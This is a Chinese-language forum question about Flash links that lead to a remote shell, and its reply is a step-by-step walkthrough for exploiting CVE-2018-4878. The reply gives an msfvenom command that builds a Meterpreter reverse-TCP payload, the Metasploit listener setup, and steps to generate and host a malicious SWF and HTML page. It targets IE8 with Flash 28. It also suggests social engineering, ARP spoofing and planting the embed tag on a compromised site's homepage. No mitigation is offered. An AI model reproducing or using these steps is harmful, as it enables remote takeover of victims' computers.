发 帖  
原厂入驻New
[问答]

用户用浏览器/邮件/Office 访问Flash链接被getshell应该如何解决?

128 getshell Flash
分享
从公众号获取到一份“ATT&CK手册”,看到了这个漏洞CVE-2018-4878,但是一直没实操,今天刚好有点时间记录下,但是内容基本和网上的资料差不多,,,
利用场景:攻击者通过构造特殊的 Flash 链接,当用户用浏览器/邮件/Office 访问此 Flash 链接时,会被“远程代码执行”,并且直接被 getshell。一般来说可以配合社工,如果在内网环境可以配合arp欺骗一起利用,效果更佳。



0
2020-11-9 07:15:14   评论 分享淘帖 邀请回答
1个回答
1、生成反弹脚本
msfvenom  -p windows/meterpreter/reverse_tcp lhost=172.16.2.128 lport=4444 -f python>shellcode.txt
2、覆盖CVE-2018-4878.py payload部分。


2、msf监听反弹
msfconsole #启动msfuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 172.16.2.128set lport 4444run

3、CVE-2018-4878.py 生成exploit.swf、index2.html
只需要修改python代码中的绝对路径

生成文件,只需要运行python文件就好。

4、访问下载
把exploit.swf、index2.html放在任何目标可以访问到的地方即可。我这里是用的kali只带的apache服务。

5、受害者环境
Flash:AdobeFlashPlayer28.0.x(具体小版本没测过),安装即可。
浏览器:ie8或者使用ie8内核的浏览器。这里啰嗦一句户,我这win7系统标配就是ie9,可以在“安装更新”里面卸载ie9的更新。

6、访问攻击页面
说了可能不相信,我用ie8直接访问目标没反应,用这个12345浏览器居然可以,没整太明白。。。




访问就这个效果,其实核心代码“<embed src=/"" + swf + "/"></embed>”就这句,那可以各种猥琐的玩,譬如你把这句放在shell的首页,,,


6、msf接收到反弹请求
到这里基本是结束了,msf大法可以自己多百度下。

2020-11-9 14:27:31 评论

举报

撰写答案

你正在撰写答案

如果你是对答案或其他答案精选点评或询问,请使用“评论”功能。

高级模式
您需要登录后才可以回帖 登录 | 注册

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容图片侵权或者其他问题,请联系本站作侵删。 侵权投诉
我要提问
关闭

站长推荐 上一条 /9 下一条

快速回复 返回顶部 返回列表